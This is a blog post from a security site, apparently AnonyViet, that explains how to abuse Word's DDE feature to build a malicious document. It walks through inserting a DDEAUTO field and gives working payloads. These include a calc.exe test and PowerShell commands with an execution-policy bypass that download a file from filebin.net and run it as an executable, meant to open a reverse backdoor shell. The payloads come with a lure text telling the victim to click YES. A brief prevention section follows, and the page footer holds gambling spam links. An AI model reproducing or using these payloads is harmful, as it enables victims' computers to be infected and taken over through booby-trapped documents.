• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Method of attaching Virus with Word file to Hack computer

AnonyViet by AnonyViet
January 26, 2023
in Security
0

Microsoft Word is a word processing software that is installed on almost any computer. So how hackers can “hack” your computer with just word files? In Word there is a function called DDE, and Hackers can take advantage of this feature to spread Viruses.

Join the channel Telegram of the AnonyViet 👉 Link 👈

So what is DDE?

DDE stands for Dynamic Data Exchange and it is an Office feature that allows Office applications to load data from other Office applications. For example, a Word file can update a table by pulling data from an Excel file each time the Word file is opened. This feature makes Word possible to share and exchange data with other applications.

DDE has the ability to allow a Word file when opened to execute code stored in another file and allows applications to send new data updates.

As soon as you finish reading this sentence, you should open your computer/laptop and check if your Microsoft Office has this DDE function enabled or not.

Click the Windows button -> type “Registry Editor” -> Access each item as follows: \HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ -> Look at the column Name if you see the name “AllowDDE” then immediately delete it (Unless you understand this function, please delete it!)

check dde in word

So dangerous, why didn’t Microsoft fix it?

On August 23, 2017, the first report was submitted to Microsoft.

As of September 26, 2017, Microsoft has responded that this is a FEATURE and Microsoft has issued recommendations so that Office users can protect themselves from attacks. The simplest way to stay safe is to beware of any strange messages that pop up every time you open text files.

By December 2017, Microsoft officially updated the changes for Microsoft Word, still keeping the DDE function, but by default when users open a word file with DDE, the link (or command) will not be activated automatically.

Techniques for attaching Viruses to Word files

This is not exactly a virus insertion, but will trigger the virus download command and activate when you open the Word file.

Now I will proceed to detail how the hacker has hijacked your computer with a Word file.

Basically, first open the Word file, go to Insert -> Quick Parts -> Field…

field

A table will appear, double click on ” = (Formula) ”

Method of attaching Virus with Word file to Hack computer 3

A text will appear, right-click, select “Toggle Field Codes”

Toggle Field Codes

Change the content in brackets to the following code:

DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/k calc.exe"

The purpose of the above command: access and Command Prompt (cmd) on Windows and open the calculator application (calc.exe )

Save and when you open this file, Word will ask if you want to enable calc.exe?

start word virus

When YES is pressed, the calculator application will be opened

word virus is created by anonyviet.com

The question here is that you can see that Word files can access the windows cmd, so instead of opening the desktop application, we can execute many other permissions such as, open powerShell, create backdoors, download files virus to the computer and take control of the computer.

Command example:

word office virus code

{ DDEAUTO "C:\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'test1.txt' # " "for security reasons click YES" }

Purpose: Download the txt file from the above website and open the downloaded file.

Method of attaching Virus with Word file to Hack computer 4

{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'RCE.exe' # " "for security reasons click YES" }

Change from txt file to EXE file and execute (depending on what purpose this EXE file was created for eg Malware, Virus, Trojan, …) In the video I demo, the purpose of the EXE file is reverse backdoor shell windows.

Prevention

With such a level of danger, what should we do?

  • The first thing to mention is to do the same note I just mentioned.
  • Scan for viruses with the downloaded file

Website example https://www.virustotal.com/gui/

  • Beware of files from unreliable sources
  • If in doubt, go to the shop to test first.

Hope this article can protect everyone from dangerous tricks of hackers

Thank you for taking the time to read this post ^^! have a nice day.

Article by author Nguyen Quoc Khanh shared in Group Cybersecurity Awareness with Hieupc and friends – 7Onez.com

The article achieved: 5/5 – (100 votes)

Tags: attachingcomputerfileHackMethodvirusword
Previous Post

Lesson 7: AutoFit – Align Excel cells to fit the content – Basic Excel

Next Post

8 tips to help you increase productivity on Chrome

AnonyViet

AnonyViet

Related Posts

How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Seekr: Collect & manage OSINT data
Security

Seekr: Collect & manage OSINT data

November 22, 2024
Next Post
8 tips to help you increase productivity on Chrome

8 tips to help you increase productivity on Chrome

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

[Godot Shooter] #2: Creating characters & shooting bullets

[Godot Shooter] #2: Creating characters & shooting bullets

June 7, 2025

Tải App 89Bet Để Trải Nghiệm Không Giới Hạn

June 6, 2025
What do you need to learn game programming? Is it difficult? How long does it take?

What do you need to learn game programming? Is it difficult? How long does it take?

June 6, 2025
Guide to search law with AI quickly and accurately

Guide to search law with AI quickly and accurately

June 6, 2025
[Godot Shooter] #2: Creating characters & shooting bullets

[Godot Shooter] #2: Creating characters & shooting bullets

June 7, 2025

Tải App 89Bet Để Trải Nghiệm Không Giới Hạn

June 6, 2025
What do you need to learn game programming? Is it difficult? How long does it take?

What do you need to learn game programming? Is it difficult? How long does it take?

June 6, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

[Godot Shooter] #2: Creating characters & shooting bullets

[Godot Shooter] #2: Creating characters & shooting bullets

June 7, 2025

Tải App 89Bet Để Trải Nghiệm Không Giới Hạn

June 6, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET https://kubet88.yoga/ bj88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply